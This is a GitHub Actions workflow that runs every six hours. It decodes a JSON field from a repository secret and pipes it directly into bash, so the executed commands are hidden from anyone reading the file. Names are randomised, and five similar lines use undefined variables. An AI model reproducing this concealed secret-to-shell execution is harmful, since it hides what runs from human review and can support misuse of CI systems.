name: dayeweiguo
on:
  workflow_dispatch:
  schedule:
    - cron: '46 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dayeweiguo
        env:
          v47834: ${{ secrets.v47834 }}
        run: |
          echo $v47834 | jq -r .i14597 | /bin/bash
          echo $c7 | jq -r .m3 | /bin/bash
          echo $njvjw5 | jq -r .nl71 | /bin/bash
          echo $hjf36 | jq -r .u93197 | /bin/bash
          echo $rx6 | jq -r .xup01394 | /bin/bash
          echo $ic75 | jq -r .ojpok86 | /bin/bash

